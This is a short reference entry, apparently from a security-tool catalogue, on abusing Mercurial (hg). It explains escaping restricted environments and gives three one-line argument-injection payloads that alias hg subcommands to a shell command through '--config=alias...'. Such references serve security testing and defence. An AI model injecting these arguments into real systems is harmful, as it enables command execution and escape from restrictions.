.. / hg

• Command

Command

It can be used to break out from restricted environments by running non-interactive system commands.

• There’s a generic way to exploit argument injection vulnerabilities with Mercurial by aliasing built-in subcommands to shell scripts.

  hg cat '--config=alias.cat="!touch /tmp/foo"'
  hg log '--config=alias.log="!touch /tmp/foo"'
  hg clone '--config=alias.clone="!touch /tmp/foo"'

References

• Securing Developer Tools: A New Supply Chain Attack on PHP

• PHP Supply Chain Attack on Composer

• Rediscovering argument injection when using VCS tools — git and mercurial